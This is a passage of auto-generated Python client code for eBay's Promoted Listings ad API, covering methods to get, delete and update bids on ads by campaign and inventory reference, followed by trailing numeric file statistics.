raise ValueError("Missing the required parameter `ad_id` when calling `delete_ad`") # noqa: E501
# verify the required parameter 'campaign_id' is set
if ('campaign_id' not in params or
params['campaign_id'] is None):
raise ValueError("Missing the required parameter `campaign_id` when calling `delete_ad`") # noqa: E501
collection_formats = {}
path_params = {}
if 'ad_id' in params:
path_params['ad_id'] = params['ad_id'] # noqa: E501
if 'campaign_id' in params:
path_params['campaign_id'] = params['campaign_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/ad_campaign/{campaign_id}/ad/{ad_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_ads_by_inventory_reference(self, body, campaign_id, **kwargs): # noqa: E501
"""delete_ads_by_inventory_reference # noqa: E501
This method works with listings that are managed with the Inventory API. The method deletes ads using a list of seller-defined inventory reference IDs, used with the Inventory API, that are associated with the specified campaign ID. Specify the campaign ID (as a path parameter) and a list of inventoryReferenceId and inventoryReferenceType pairs to be deleted. Call getCampaigns to get a list of the seller's current campaign IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_ads_by_inventory_reference(body, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param DeleteAdsByInventoryReferenceRequest body: This request object defines the fields for the deleteAdsByInventoryReference request. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: AdIds
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_ads_by_inventory_reference_with_http_info(body, campaign_id, **kwargs) # noqa: E501
else:
(data) = self.delete_ads_by_inventory_reference_with_http_info(body, campaign_id, **kwargs) # noqa: E501
return data
def delete_ads_by_inventory_reference_with_http_info(self, body, campaign_id, **kwargs): # noqa: E501
"""delete_ads_by_inventory_reference # noqa: E501
This method works with listings that are managed with the Inventory API. The method deletes ads using a list of seller-defined inventory reference IDs, used with the Inventory API, that are associated with the specified campaign ID. Specify the campaign ID (as a path parameter) and a list of inventoryReferenceId and inventoryReferenceType pairs to be deleted. Call getCampaigns to get a list of the seller's current campaign IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_ads_by_inventory_reference_with_http_info(body, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param DeleteAdsByInventoryReferenceRequest body: This request object defines the fields for the deleteAdsByInventoryReference request. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: AdIds
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'campaign_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_ads_by_inventory_reference" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `delete_ads_by_inventory_reference`") # noqa: E501
# verify the required parameter 'campaign_id' is set
if ('campaign_id' not in params or
params['campaign_id'] is None):
raise ValueError("Missing the required parameter `campaign_id` when calling `delete_ads_by_inventory_reference`") # noqa: E501
collection_formats = {}
path_params = {}
if 'campaign_id' in params:
path_params['campaign_id'] = params['campaign_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/ad_campaign/{campaign_id}/delete_ads_by_inventory_reference', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdIds', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_ad(self, ad_id, campaign_id, **kwargs): # noqa: E501
"""get_ad # noqa: E501
This method retrieves the specified ad from the specified campaign. In the request, supply the campaign_id and ad_id as path parameters. Call getCampaigns to retrieve a list of the seller's current campaign IDs and call getAds to retrieve their current ad IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_ad(ad_id, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ad_id: Identifier of an ad. This ID was generated when the ad was created. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: Ad
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_ad_with_http_info(ad_id, campaign_id, **kwargs) # noqa: E501
else:
(data) = self.get_ad_with_http_info(ad_id, campaign_id, **kwargs) # noqa: E501
return data
def get_ad_with_http_info(self, ad_id, campaign_id, **kwargs): # noqa: E501
"""get_ad # noqa: E501
This method retrieves the specified ad from the specified campaign. In the request, supply the campaign_id and ad_id as path parameters. Call getCampaigns to retrieve a list of the seller's current campaign IDs and call getAds to retrieve their current ad IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_ad_with_http_info(ad_id, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ad_id: Identifier of an ad. This ID was generated when the ad was created. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: Ad
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['ad_id', 'campaign_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_ad" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'ad_id' is set
if ('ad_id' not in params or
params['ad_id'] is None):
raise ValueError("Missing the required parameter `ad_id` when calling `get_ad`") # noqa: E501
# verify the required parameter 'campaign_id' is set
if ('campaign_id' not in params or
params['campaign_id'] is None):
raise ValueError("Missing the required parameter `campaign_id` when calling `get_ad`") # noqa: E501
collection_formats = {}
path_params = {}
if 'ad_id' in params:
path_params['ad_id'] = params['ad_id'] # noqa: E501
if 'campaign_id' in params:
path_params['campaign_id'] = params['campaign_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/ad_campaign/{campaign_id}/ad/{ad_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Ad', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_ads(self, campaign_id, **kwargs): # noqa: E501
"""get_ads # noqa: E501
This method retrieves Promoted Listings ads that are associated with listings created with either the Trading API or the Inventory API. The method retrieves ads related to the specified campaign. Specify the Promoted Listings campaign to target with the campaign_id path parameter. Because of the large number of possible results, you can use query parameters to paginate the result set by specifying a limit, which dictates how many ads to return on each page of the response. You can also specify how many ads to skip in the result set before returning the first result using the offset path parameter. Call getCampaigns to retrieve the current campaign IDs for the seller. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_ads(campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:param str limit: Specifies the maximum number of ads to return on a page in the paginated response. Default: 10 Maximum: 500
:param str listing_ids: A comma separated list of listing IDs. The response includes only active ads (ads associated with a RUNNING campaign). The results do not include listing IDs that are excluded by other conditions.
:param str offset: Specifies the number of ads to skip in the result set before returning the first ad in the paginated response. Combine offset with the limit query parameter to control the items returned in the response. For example, if you supply an offset of 0 and a limit of 10, the first page of the response contains the first 10 items from the complete list of items retrieved by the call. If offset is 10 and limit is 20, the first page of the response contains items 11-30 from the complete result set. Default: 0
:return: AdPagedCollection
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_ads_with_http_info(campaign_id, **kwargs) # noqa: E501
else:
(data) = self.get_ads_with_http_info(campaign_id, **kwargs) # noqa: E501
return data
def get_ads_with_http_info(self, campaign_id, **kwargs): # noqa: E501
"""get_ads # noqa: E501
This method retrieves Promoted Listings ads that are associated with listings created with either the Trading API or the Inventory API. The method retrieves ads related to the specified campaign. Specify the Promoted Listings campaign to target with the campaign_id path parameter. Because of the large number of possible results, you can use query parameters to paginate the result set by specifying a limit, which dictates how many ads to return on each page of the response. You can also specify how many ads to skip in the result set before returning the first result using the offset path parameter. Call getCampaigns to retrieve the current campaign IDs for the seller. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_ads_with_http_info(campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:param str limit: Specifies the maximum number of ads to return on a page in the paginated response. Default: 10 Maximum: 500
:param str listing_ids: A comma separated list of listing IDs. The response includes only active ads (ads associated with a RUNNING campaign). The results do not include listing IDs that are excluded by other conditions.
:param str offset: Specifies the number of ads to skip in the result set before returning the first ad in the paginated response. Combine offset with the limit query parameter to control the items returned in the response. For example, if you supply an offset of 0 and a limit of 10, the first page of the response contains the first 10 items from the complete list of items retrieved by the call. If offset is 10 and limit is 20, the first page of the response contains items 11-30 from the complete result set. Default: 0
:return: AdPagedCollection
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['campaign_id', 'limit', 'listing_ids', 'offset'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_ads" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'campaign_id' is set
if ('campaign_id' not in params or
params['campaign_id'] is None):
raise ValueError("Missing the required parameter `campaign_id` when calling `get_ads`") # noqa: E501
collection_formats = {}
path_params = {}
if 'campaign_id' in params:
path_params['campaign_id'] = params['campaign_id'] # noqa: E501
query_params = []
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'listing_ids' in params:
query_params.append(('listing_ids', params['listing_ids'])) # noqa: E501
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/ad_campaign/{campaign_id}/ad', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdPagedCollection', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_ads_by_inventory_reference(self, campaign_id, inventory_reference_id, inventory_reference_type, **kwargs): # noqa: E501
"""get_ads_by_inventory_reference # noqa: E501
This method retrieves Promoted Listings ads associated with listings that are managed with the Inventory API from the specified campaign. Supply the campaign_id as a path parameter and use query parameters to specify the inventory_reference_id and inventory_reference_type pairs. In the Inventory API, an inventory reference ID is either a seller-defined SKU value or an inventoryItemGroupKey (a seller-defined ID for an inventory item group, which is an entity that's used in the Inventory API to create a multiple-variation listing). To indicate a listing managed by the Inventory API, you must always specify both an inventory_reference_id and the associated inventory_reference_type. Call getCampaigns to retrieve all of the seller's the current campaign IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_ads_by_inventory_reference(campaign_id, inventory_reference_id, inventory_reference_type, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:param str inventory_reference_id: The inventory reference ID associated with the ad you want returned. A seller's inventory reference ID is the ID of either a listing or the ID of an inventory item group (the parent of a multi-variation listing, such as a shirt that is available in multiple sizes and colors). You must always supply in both an inventory_reference_id and an inventory_reference_type. (required)
:param str inventory_reference_type: The type of the inventory reference ID. Set this value to either INVENTORY_ITEM (a single listing) or INVENTORY_ITEM_GROUP (a multi-variation listing). You must always pass in both an inventory_reference_id and an inventory_reference_type. (required)
:return: Ads
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_ads_by_inventory_reference_with_http_info(campaign_id, inventory_reference_id, inventory_reference_type, **kwargs) # noqa: E501
else:
(data) = self.get_ads_by_inventory_reference_with_http_info(campaign_id, inventory_reference_id, inventory_reference_type, **kwargs) # noqa: E501
return data
def get_ads_by_inventory_reference_with_http_info(self, campaign_id, inventory_reference_id, inventory_reference_type, **kwargs): # noqa: E501
"""get_ads_by_inventory_reference # noqa: E501
This method retrieves Promoted Listings ads associated with listings that are managed with the Inventory API from the specified campaign. Supply the campaign_id as a path parameter and use query parameters to specify the inventory_reference_id and inventory_reference_type pairs. In the Inventory API, an inventory reference ID is either a seller-defined SKU value or an inventoryItemGroupKey (a seller-defined ID for an inventory item group, which is an entity that's used in the Inventory API to create a multiple-variation listing). To indicate a listing managed by the Inventory API, you must always specify both an inventory_reference_id and the associated inventory_reference_type. Call getCampaigns to retrieve all of the seller's the current campaign IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_ads_by_inventory_reference_with_http_info(campaign_id, inventory_reference_id, inventory_reference_type, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:param str inventory_reference_id: The inventory reference ID associated with the ad you want returned. A seller's inventory reference ID is the ID of either a listing or the ID of an inventory item group (the parent of a multi-variation listing, such as a shirt that is available in multiple sizes and colors). You must always supply in both an inventory_reference_id and an inventory_reference_type. (required)
:param str inventory_reference_type: The type of the inventory reference ID. Set this value to either INVENTORY_ITEM (a single listing) or INVENTORY_ITEM_GROUP (a multi-variation listing). You must always pass in both an inventory_reference_id and an inventory_reference_type. (required)
:return: Ads
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['campaign_id', 'inventory_reference_id', 'inventory_reference_type'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_ads_by_inventory_reference" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'campaign_id' is set
if ('campaign_id' not in params or
params['campaign_id'] is None):
raise ValueError("Missing the required parameter `campaign_id` when calling `get_ads_by_inventory_reference`") # noqa: E501
# verify the required parameter 'inventory_reference_id' is set
if ('inventory_reference_id' not in params or
params['inventory_reference_id'] is None):
raise ValueError("Missing the required parameter `inventory_reference_id` when calling `get_ads_by_inventory_reference`") # noqa: E501
# verify the required parameter 'inventory_reference_type' is set
if ('inventory_reference_type' not in params or
params['inventory_reference_type'] is None):
raise ValueError("Missing the required parameter `inventory_reference_type` when calling `get_ads_by_inventory_reference`") # noqa: E501
collection_formats = {}
path_params = {}
if 'campaign_id' in params:
path_params['campaign_id'] = params['campaign_id'] # noqa: E501
query_params = []
if 'inventory_reference_id' in params:
query_params.append(('inventory_reference_id', params['inventory_reference_id'])) # noqa: E501
if 'inventory_reference_type' in params:
query_params.append(('inventory_reference_type', params['inventory_reference_type'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/ad_campaign/{campaign_id}/get_ads_by_inventory_reference', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Ads', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_bid(self, body, ad_id, campaign_id, **kwargs): # noqa: E501
"""update_bid # noqa: E501
This method updates the bid percentage (also known as the "ad rate") for the specified ad in the specified campaign. In the request, supply the campaign_id and ad_id as path parameters, and supply the new bidPercentage value in the payload of the call. Call getCampaigns to retrieve a seller's current campaign IDs and call getAds to get their ad IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_bid(body, ad_id, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param UpdateBidPercentageRequest body: This type defines the fields for the updateBid request. (required)
:param str ad_id: A unique eBay-assigned ID for an ad that's generated when an ad is created. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_bid_with_http_info(body, ad_id, campaign_id, **kwargs) # noqa: E501
else:
(data) = self.update_bid_with_http_info(body, ad_id, campaign_id, **kwargs) # noqa: E501
return data
def update_bid_with_http_info(self, body, ad_id, campaign_id, **kwargs): # noqa: E501
"""update_bid # noqa: E501
This method updates the bid percentage (also known as the "ad rate") for the specified ad in the specified campaign. In the request, supply the campaign_id and ad_id as path parameters, and supply the new bidPercentage value in the payload of the call. Call getCampaigns to retrieve a seller's current campaign IDs and call getAds to get their ad IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_bid_with_http_info(body, ad_id, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param UpdateBidPercentageRequest body: This type defines the fields for the updateBid request. (required)
:param str ad_id: A unique eBay-assigned ID for an ad that's generated when an ad is created. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'ad_id', 'campaign_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_bid" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_bid`") # noqa: E501
# verify the required parameter 'ad_id' is set
if ('ad_id' not in params or
params['ad_id'] is None):
raise ValueError("Missing the required parameter `ad_id` when calling `update_bid`") # noqa: E501
# verify the required parameter 'campaign_id' is set
if ('campaign_id' not in params or
params['campaign_id'] is None):
raise ValueError("Missing the required parameter `campaign_id` when calling `update_bid`") # noqa: E501
collection_formats = {}
path_params = {}
if 'ad_id' in params:
path_params['ad_id'] = params['ad_id'] # noqa: E501
if 'campaign_id' in params:
path_params['campaign_id'] = params['campaign_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/ad_campaign/{campaign_id}/ad/{ad_id}/update_bid', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 60.22055
| 2,092
| 0.681396
| 12,291
| 92,017
| 4.91091
| 0.033358
| 0.044069
| 0.024188
| 0.023244
| 0.963999
| 0.960752
| 0.95999
| 0.955368
| 0.953612
| 0.951243
| 0
| 0.011803
| 0.248661
| 92,017
| 1,527
| 2,093
| 60.259987
| 0.861259
| 0.522175
| 0
| 0.806954
| 0
| 0
| 0.223073
| 0.077491
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034772
| false
| 0
| 0.004796
| 0
| 0.091127
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.